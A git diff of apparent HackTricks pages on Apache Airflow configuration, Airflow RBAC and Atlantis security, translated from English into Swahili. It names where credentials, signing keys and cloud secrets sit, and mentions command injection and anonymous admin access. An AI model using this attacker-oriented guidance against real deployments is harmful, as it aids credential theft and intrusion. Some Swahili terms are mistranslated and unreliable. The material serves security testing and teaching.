foo = Variable.get("foo")
```
-
-If they are used for example inside a a bash command, you could perform a command injection.
+Ikiwa zinatumika kwa mfano ndani ya amri ya bash, unaweza kufanya uhamasishaji wa amri.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
index 5fd8e486b..758433425 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
@@ -4,112 +4,102 @@
## Configuration File
-**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
+**Apache Airflow** inazalisha **config file** katika mashine zote za airflow inayoitwa **`airflow.cfg`** katika nyumbani ya mtumiaji wa airflow. Faili hii ya config ina taarifa za usanidi na **inaweza kuwa na taarifa za kuvutia na nyeti.**
-**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
+**Kuna njia mbili za kufikia faili hii: Kwa kuathiri mashine fulani ya airflow, au kwa kufikia console ya wavuti.**
-Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
+Kumbuka kwamba **maadili ndani ya faili ya config** **yanaweza kuwa si yale yanayotumika**, kwani unaweza kuyabadilisha kwa kuweka mabadiliko ya mazingira kama `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
-If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
-If you have **access to some machine inside the airflow env**, check the **environment**.
+Ikiwa una ufikiaji wa **faili ya config katika seva ya wavuti**, unaweza kuangalia **usanidi halisi unaoendelea** katika ukurasa huo ambapo config inaonyeshwa.\
+Ikiwa una **ufikiaji wa mashine fulani ndani ya mazingira ya airflow**, angalia **mazingira**.
-Some interesting values to check when reading the config file:
+Baadhi ya maadili ya kuvutia ya kuangalia unapokuwa unaisoma faili ya config:
### \[api]
-- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
-- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
-- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
-- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
- - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- - `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- - You can also **create you own authentication** method with python.
-- **`google_key_path`:** Path to the **GCP service account key**
+- **`access_control_allow_headers`**: Hii inaonyesha **headers** **zinazoruhusiwa** kwa **CORS**
+- **`access_control_allow_methods`**: Hii inaonyesha **mbinu** **zinazoruhusiwa** kwa **CORS**
+- **`access_control_allow_origins`**: Hii inaonyesha **michango** **zinazoruhusiwa** kwa **CORS**
+- **`auth_backend`**: [**Kulingana na nyaraka**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) chaguzi chache zinaweza kuwekwa ili kuunda nani anaweza kufikia API:
+- `airflow.api.auth.backend.deny_all`: **Kwa default hakuna** anayeweza kufikia API
+- `airflow.api.auth.backend.default`: **Kila mtu anaweza** kuifikia bila uthibitisho
+- `airflow.api.auth.backend.kerberos_auth`: Ili kuunda **uthibitisho wa kerberos**
+- `airflow.api.auth.backend.basic_auth`: Kwa **uthibitisho wa msingi**
+- `airflow.composer.api.backend.composer_auth`: Inatumia uthibitisho wa waandishi (GCP) (kutoka [**hapa**](https://cloud.google.com/composer/docs/access-airflow-api)).
+- `composer_auth_user_registration_role`: Hii inaonyesha **nafasi** ambayo **mtumiaji wa composer** atapata ndani ya **airflow** (**Op** kwa default).
+- Unaweza pia **kuunda njia yako ya uthibitisho** kwa kutumia python.
+- **`google_key_path`:** Njia ya **GCP service account key**
### **\[atlas]**
-- **`password`**: Atlas password
-- **`username`**: Atlas username
+- **`password`**: Neno la siri la Atlas
+- **`username`**: Jina la mtumiaji la Atlas
### \[celery]
-- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
-- **`result_backend`**: Postgres url which may contain **credentials**.
-- **`ssl_cacert`**: Path to the cacert
-- **`ssl_cert`**: Path to the cert
-- **`ssl_key`**: Path to the key
+- **`flower_basic_auth`** : Taarifa za kuingia (_user1:password1,user2:password2_)
+- **`result_backend`**: URL ya Postgres ambayo inaweza kuwa na **taarifa za kuingia**.
+- **`ssl_cacert`**: Njia ya cacert
+- **`ssl_cert`**: Njia ya cheti
+- **`ssl_key`**: Njia ya ufunguo
### \[core]
-- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that donāt contain the strings `DAG` and `airflow`.
-- **`fernet_key`**: Key to store encrypted variables (symmetric)
-- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
-- **`security`**: What security module to use (for example kerberos)
+- **`dag_discovery_safe_mode`**: Imewezeshwa kwa default. Wakati wa kugundua DAGs, puuza faili zozote ambazo hazina nyuzi `DAG` na `airflow`.
+- **`fernet_key`**: Ufunguzi wa kuhifadhi mabadiliko yaliyosimbwa (symmetric)
+- **`hide_sensitive_var_conn_fields`**: Imewezeshwa kwa default, ficha taarifa nyeti za muunganisho.
+- **`security`**: Moduli gani ya usalama itumike (kwa mfano kerberos)
### \[dask]
-- **`tls_ca`**: Path to ca
-- **`tls_cert`**: Part to the cert
-- **`tls_key`**: Part to the tls key
+- **`tls_ca`**: Njia ya ca
+- **`tls_cert`**: Njia ya cheti
+- **`tls_key`**: Njia ya ufunguo wa tls
### \[kerberos]
-- **`ccache`**: Path to ccache file
-- **`forwardable`**: Enabled by default
+- **`ccache`**: Njia ya faili ya ccache
+- **`forwardable`**: Imewezeshwa kwa default
### \[logging]
-- **`google_key_path`**: Path to GCP JSON creds.
+- **`google_key_path`**: Njia ya GCP JSON creds.
### \[secrets]
-- **`backend`**: Full class name of secrets backend to enable
-- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
+- **`backend`**: Jina kamili la darasa la nyuma la siri ili kuwezesha
+- **`backend_kwargs`**: Param ya backend_kwargs inasomwa katika kamusi na kupitishwa kwa **init** ya darasa la nyuma la siri.
### \[smtp]
-- **`smtp_password`**: SMTP password
-- **`smtp_user`**: SMTP user
+- **`smtp_password`**: Neno la siri la SMTP
+- **`smtp_user`**: Mtumiaji wa SMTP
### \[webserver]
-- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
-- **`cookie_secure`**: Set **secure flag** on the the session cookie
-- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
-- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
-- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
-- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
-- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
-- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
+- **`cookie_samesite`**: Kwa default ni **Lax**, hivyo tayari ni thamani dhaifu zaidi
+- **`cookie_secure`**: Weka **bendera salama** kwenye cookie ya kikao
+- **`expose_config`**: Kwa default ni False, ikiwa ni kweli, **config** inaweza **kusomwa** kutoka kwa **console** ya wavuti
+- **`expose_stacktrace`**: Kwa default ni Kweli, itaonyesha **python tracebacks** (inaweza kuwa na manufaa kwa mshambuliaji)
+- **`secret_key`**: Hii ni **ufunguo unaotumiwa na flask kusaini cookies** (ikiwa una hii unaweza **kujifanya kuwa mtumiaji yeyote katika Airflow**)
+- **`web_server_ssl_cert`**: **Njia** ya **SSL** **cheti**
+- **`web_server_ssl_key`**: **Njia** ya **SSL** **Key**
+- **`x_frame_enabled`**: Default ni **True**, hivyo kwa default clickjacking haiwezekani
### Web Authentication
-By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
-
+Kwa default **uthibitisho wa wavuti** umeainishwa katika faili **`webserver_config.py`** na umewekwa kama
```bash
AUTH_TYPE = AUTH_DB
```
-
-Which means that the **authentication is checked against the database**. However, other configurations are possible like
-
+Ambayo inamaanisha kwamba **uthibitishaji unakaguliwa dhidi ya hifadhidata**. Hata hivyo, usanidi mwingine unaweza kuwa kama
```bash
AUTH_TYPE = AUTH_OAUTH
```
+Ili kuacha **uthibitishaji kwa huduma za upande wa tatu**.
-To leave the **authentication to third party services**.
-
-However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
-
+Hata hivyo, kuna chaguo pia la **kuruhusu watumiaji wasiojulikana kuingia**, kuweka parameter ifuatayo kwa **jukumu lililotakikana**:
```bash
AUTH_ROLE_PUBLIC = 'Admin'
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
index 7ff782327..273177f25 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
@@ -4,44 +4,40 @@
## RBAC
-(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
+(Kutoka kwenye nyaraka)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow inakuja na **seti ya majukumu kwa default**: **Admin**, **User**, **Op**, **Viewer**, na **Public**. **Ni `Admin` tu** watumiaji wanaweza **kuunda/kubadilisha ruhusa za majukumu mengine**. Lakini haipendekezwi kwa watumiaji wa `Admin` kubadilisha majukumu haya ya default kwa njia yoyote kwa kuondoa au kuongeza ruhusa kwa majukumu haya.
-- **`Admin`** users have all possible permissions.
-- **`Public`** users (anonymous) donāt have any permissions.
-- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
-- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
-- **`Op`** users have `User` permissions plus additional op permissions.
+- **`Admin`** watumiaji wana ruhusa zote zinazowezekana.
+- **`Public`** watumiaji (wasiojulikana) hawana ruhusa yoyote.
+- **`Viewer`** watumiaji wana ruhusa za mtazamaji zilizo na mipaka (kusoma tu). **Haiwezi kuona usanidi.**
+- **`User`** watumiaji wana ruhusa za `Viewer` pamoja na ruhusa za ziada za mtumiaji zinazomruhusu kusimamia DAGs kidogo. Anaweza **kuona faili ya usanidi**
+- **`Op`** watumiaji wana ruhusa za `User` pamoja na ruhusa za ziada za op.
-Note that **admin** users can **create more roles** with more **granular permissions**.
+Kumbuka kwamba **watumiaji wa admin** wanaweza **kuunda majukumu zaidi** yenye **ruhusa za kina**.
-Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
+Pia kumbuka kwamba jukumu pekee la default lenye **ruhusa ya kuorodhesha watumiaji na majukumu ni Admin, hata `Op` hataweza kufanya hivyo.**
-### Default Permissions
+### Ruhusa za Default
-These are the default permissions per default role:
+Hizi ndizo ruhusa za default kwa kila jukumu la default:
- **Admin**
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
+\[anaweza kufuta kwenye Connections, anaweza kusoma kwenye Connections, anaweza kuhariri kwenye Connections, anaweza kuunda kwenye Connections, anaweza kusoma kwenye DAGs, anaweza kuhariri kwenye DAGs, anaweza kufuta kwenye DAGs, anaweza kusoma kwenye DAG Runs, anaweza kusoma kwenye Task Instances, anaweza kuhariri kwenye Task Instances, anaweza kufuta kwenye DAG Runs, anaweza kuunda kwenye DAG Runs, anaweza kuhariri kwenye DAG Runs, anaweza kusoma kwenye Audit Logs, anaweza kusoma kwenye ImportError, anaweza kufuta kwenye Pools, anaweza kusoma kwenye Pools, anaweza kuhariri kwenye Pools, anaweza kuunda kwenye Pools, anaweza kusoma kwenye Providers, anaweza kufuta kwenye Variables, anaweza kusoma kwenye Variables, anaweza kuhariri kwenye Variables, anaweza kuunda kwenye Variables, anaweza kusoma kwenye XComs, anaweza kusoma kwenye DAG Code, anaweza kusoma kwenye Configurations, anaweza kusoma kwenye Plugins, anaweza kusoma kwenye Roles, anaweza kusoma kwenye Permissions, anaweza kufuta kwenye Roles, anaweza kuhariri kwenye Roles, anaweza kuunda kwenye Roles, anaweza kusoma kwenye Users, anaweza kuunda kwenye Users, anaweza kuhariri kwenye Users, anaweza kufuta kwenye Users, anaweza kusoma kwenye DAG Dependencies, anaweza kusoma kwenye Jobs, anaweza kusoma kwenye My Password, anaweza kuhariri kwenye My Password, anaweza kusoma kwenye My Profile, anaweza kuhariri kwenye My Profile, anaweza kusoma kwenye SLA Misses, anaweza kusoma kwenye Task Logs, anaweza kusoma kwenye Website, ufikiaji wa menyu kwenye Browse, ufikiaji wa menyu kwenye DAG Dependencies, ufikiaji wa menyu kwenye DAG Runs, ufikiaji wa menyu kwenye Documentation, ufikiaji wa menyu kwenye Docs, ufikiaji wa menyu kwenye Jobs, ufikiaji wa menyu kwenye Audit Logs, ufikiaji wa menyu kwenye Plugins, ufikiaji wa menyu kwenye SLA Misses, ufikiaji wa menyu kwenye Task Instances, anaweza kuunda kwenye Task Instances, anaweza kufuta kwenye Task Instances, ufikiaji wa menyu kwenye Admin, ufikiaji wa menyu kwenye Configurations, ufikiaji wa menyu kwenye Connections, ufikiaji wa menyu kwenye Pools, ufikiaji wa menyu kwenye Variables, ufikiaji wa menyu kwenye XComs, anaweza kufuta kwenye XComs, anaweza kusoma kwenye Task Reschedules, ufikiaji wa menyu kwenye Task Reschedules, anaweza kusoma kwenye Triggers, ufikiaji wa menyu kwenye Triggers, anaweza kusoma kwenye Passwords, anaweza kuhariri kwenye Passwords, ufikiaji wa menyu kwenye List Users, ufikiaji wa menyu kwenye Security, ufikiaji wa menyu kwenye List Roles, anaweza kusoma kwenye User Stats Chart, ufikiaji wa menyu kwenye User's Statistics, ufikiaji wa menyu kwenye Base Permissions, anaweza kusoma kwenye View Menus, ufikiaji wa menyu kwenye Views/Menus, anaweza kusoma kwenye Permission Views, ufikiaji wa menyu kwenye Permission on Views/Menus, anaweza kupata kwenye MenuApi, ufikiaji wa menyu kwenye Providers, anaweza kuunda kwenye XComs]
- **Op**
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
+\[anaweza kufuta kwenye Connections, anaweza kusoma kwenye Connections, anaweza kuhariri kwenye Connections, anaweza kuunda kwenye Connections, anaweza kusoma kwenye DAGs, anaweza kuhariri kwenye DAGs, anaweza kufuta kwenye DAGs, anaweza kusoma kwenye DAG Runs, anaweza kusoma kwenye Task Instances, anaweza kuhariri kwenye Task Instances, anaweza kufuta kwenye DAG Runs, anaweza kuunda kwenye DAG Runs, anaweza kuhariri kwenye DAG Runs, anaweza kusoma kwenye Audit Logs, anaweza kusoma kwenye ImportError, anaweza kufuta kwenye Pools, anaweza kusoma kwenye Pools, anaweza kuhariri kwenye Pools, anaweza kuunda kwenye Pools, anaweza kusoma kwenye Providers, anaweza kufuta kwenye Variables, anaweza kusoma kwenye Variables, anaweza kuhariri kwenye Variables, anaweza kuunda kwenye Variables, anaweza kusoma kwenye XComs, anaweza kusoma kwenye DAG Code, anaweza kusoma kwenye Configurations, anaweza kusoma kwenye Plugins, anaweza kusoma kwenye DAG Dependencies, anaweza kusoma kwenye Jobs, anaweza kusoma kwenye My Password, anaweza kuhariri kwenye My Password, anaweza kusoma kwenye My Profile, anaweza kuhariri kwenye My Profile, anaweza kusoma kwenye SLA Misses, anaweza kusoma kwenye Task Logs, anaweza kusoma kwenye Website, ufikiaji wa menyu kwenye Browse, ufikiaji wa menyu kwenye DAG Dependencies, ufikiaji wa menyu kwenye DAG Runs, ufikiaji wa menyu kwenye Documentation, ufikiaji wa menyu kwenye Docs, ufikiaji wa menyu kwenye Jobs, ufikiaji wa menyu kwenye Audit Logs, ufikiaji wa menyu kwenye Plugins, ufikiaji wa menyu kwenye SLA Misses, ufikiaji wa menyu kwenye Task Instances, anaweza kuunda kwenye Task Instances, anaweza kufuta kwenye Task Instances, ufikiaji wa menyu kwenye Admin, ufikiaji wa menyu kwenye Configurations, ufikiaji wa menyu kwenye Connections, ufikiaji wa menyu kwenye Pools, ufikiaji wa menyu kwenye Variables, ufikiaji wa menyu kwenye XComs, anaweza kufuta kwenye XComs]
- **User**
-\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
+\[anaweza kusoma kwenye DAGs, anaweza kuhariri kwenye DAGs, anaweza kufuta kwenye DAGs, anaweza kusoma kwenye DAG Runs, anaweza kusoma kwenye Task Instances, anaweza kuhariri kwenye Task Instances, anaweza kufuta kwenye DAG Runs, anaweza kuunda kwenye DAG Runs, anaweza kuhariri kwenye DAG Runs, anaweza kusoma kwenye Audit Logs, anaweza kusoma kwenye ImportError, anaweza kusoma kwenye XComs, anaweza kusoma kwenye DAG Code, anaweza kusoma kwenye Plugins, anaweza kusoma kwenye DAG Dependencies, anaweza kusoma kwenye Jobs, anaweza kusoma kwenye My Password, anaweza kuhariri kwenye My Password, anaweza kusoma kwenye My Profile, anaweza kuhariri kwenye My Profile, anaweza kusoma kwenye SLA Misses, anaweza kusoma kwenye Task Logs, anaweza kusoma kwenye Website, ufikiaji wa menyu kwenye Browse, ufikiaji wa menyu kwenye DAG Dependencies, ufikiaji wa menyu kwenye DAG Runs, ufikiaji wa menyu kwenye Documentation, ufikiaji wa menyu kwenye Docs, ufikiaji wa menyu kwenye Jobs, ufikiaji wa menyu kwenye Audit Logs, ufikiaji wa menyu kwenye Plugins, ufikiaji wa menyu kwenye SLA Misses, ufikiaji wa menyu kwenye Task Instances, anaweza kuunda kwenye Task Instances, anaweza kufuta kwenye Task Instances]
- **Viewer**
-\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
+\[anaweza kusoma kwenye DAGs, anaweza kusoma kwenye DAG Runs, anaweza kusoma kwenye Task Instances, anaweza kusoma kwenye Audit Logs, anaweza kusoma kwenye ImportError, anaweza kusoma kwenye XComs, anaweza kusoma kwenye DAG Code, anaweza kusoma kwenye Plugins, anaweza kusoma kwenye DAG Dependencies, anaweza kusoma kwenye Jobs, anaweza kusoma kwenye My Password, anaweza kuhariri kwenye My Password, anaweza kusoma kwenye My Profile, anaweza kuhariri kwenye My Profile, anaweza kusoma kwenye SLA Misses, anaweza kusoma kwenye Task Logs, anaweza kusoma kwenye Website, ufikiaji wa menyu kwenye Browse, ufikiaji wa menyu kwenye DAG Dependencies, ufikiaji wa menyu kwenye DAG Runs, ufikiaji wa menyu kwenye Documentation, ufikiaji wa menyu kwenye Docs, ufikiaji wa menyu kwenye Jobs, ufikiaji wa menyu kwenye Audit Logs, ufikiaji wa menyu kwenye Plugins, ufikiaji wa menyu kwenye SLA Misses, ufikiaji wa menyu kwenye Task Instances]
- **Public**
\[]
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md
index a4b35140f..9333d4c16 100644
--- a/src/pentesting-ci-cd/atlantis-security.md
+++ b/src/pentesting-ci-cd/atlantis-security.md
@@ -4,109 +4,109 @@
### Basic Information
-Atlantis basically helps you to to run terraform from Pull Requests from your git server.
+Atlantis kimsingi inakusaidia kuendesha terraform kutoka kwa Pull Requests kutoka kwa seva yako ya git.
.png>)
### Local Lab
-1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
-2. Create a **personal token** (with repo access) of your **github** user
-3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
- 1. You can access the web page in 127.0.0.1:4141
+1. Nenda kwenye **ukurasa wa toleo la atlantis** katika [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) na **pakua** ile inayokufaa.
+2. Unda **token ya kibinafsi** (ikiwa na ufikiaji wa repo) ya mtumiaji wako wa **github**
+3. Tekeleza `./atlantis testdrive` na itaunda **demo repo** ambayo unaweza kutumia ku **zungumza na atlantis**
+1. Unaweza kufikia ukurasa wa wavuti katika 127.0.0.1:4141
### Atlantis Access
#### Git Server Credentials
-**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
-However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
-[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
+**Atlantis** inasaidia wenyeji kadhaa wa git kama **Github**, **Gitlab**, **Bitbucket** na **Azure DevOps**.\
+Hata hivyo, ili kufikia repos katika majukwaa hayo na kufanya vitendo, inahitaji kuwa na **ufikiaji wa kibali uliopewa** (angalau ruhusa za kuandika).\
+[**Nyaraka**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) zinahimiza kuunda mtumiaji katika majukwaa haya mahsusi kwa Atlantis, lakini watu wengine wanaweza kutumia akaunti za kibinafsi.
> [!WARNING]
-> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
+> Katika hali yoyote, kutoka kwa mtazamo wa washambuliaji, **akaunti ya Atlantis** itakuwa moja ya **ya kuvutia** **kuvunjwa**.
#### Webhooks
-Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
+Atlantis inatumia kwa hiari [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) kuthibitisha kwamba **webhooks** inazopokea kutoka kwa mwenyeji wako wa Git ni **halali**.
-One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
+Njia moja ya kuthibitisha hii ingekuwa **kuruhusu maombi kuja tu kutoka kwa IPs** za mwenyeji wako wa Git lakini njia rahisi ni kutumia Webhook Secret.
-Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
+Kumbuka kwamba isipokuwa unatumia seva ya github au bitbucket ya kibinafsi, utahitaji kufichua mwisho wa webhook kwa Mtandao.
> [!WARNING]
-> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
+> Atlantis itakuwa **ikifichua webhooks** ili seva ya git iweze kutuma habari. Kutoka kwa mtazamo wa washambuliaji itakuwa ya kuvutia kujua **kama unaweza kutuma ujumbe**.
#### Provider Credentials
-[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html)
+[Kutoka kwenye nyaraka:](https://www.runatlantis.io/docs/provider-credentials.html)
-Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
+Atlantis inafanya Terraform kwa kuendesha tu **amri `terraform plan` na `apply`** kwenye seva **ambayo Atlantis inahifadhiwa**. Kama unavyofanya Terraform kwa ndani, Atlantis inahitaji akreditif za mtoa huduma wako maalum.
-It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
+Ni juu yako jinsi unavyoweza [kutoa akreditif](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) kwa mtoa huduma wako maalum kwa Atlantis:
-- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
-- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
- - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
- - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
-- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
-- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
-- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
+- Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) na [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) zina mifumo yao wenyewe ya akreditif za mtoa huduma. Soma nyaraka zao.
+- Ikiwa unafanya kazi na Atlantis katika wingu basi mawingu mengi yana njia za kutoa ufikiaji wa API ya wingu kwa programu zinazofanya kazi ndani yao, mfano:
+- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Tafuta "EC2 Role")
+- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
+- Watumiaji wengi huweka mabadiliko ya mazingira, mfano. `AWS_ACCESS_KEY`, ambapo Atlantis inafanya kazi.
+- Wengine huunda faili za usanidi zinazohitajika, mfano. `~/.aws/credentials`, ambapo Atlantis inafanya kazi.
+- Tumia [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) kupata akreditif za mtoa huduma.
> [!WARNING]
-> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
+> **Container** ambapo **Atlantis** inafanya **kazi** itakuwa na uwezekano mkubwa **kuhifadhi akreditif za kibali** kwa watoa huduma (AWS, GCP, Github...) ambao Atlantis inasimamia kupitia Terraform.
#### Web Page
-By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
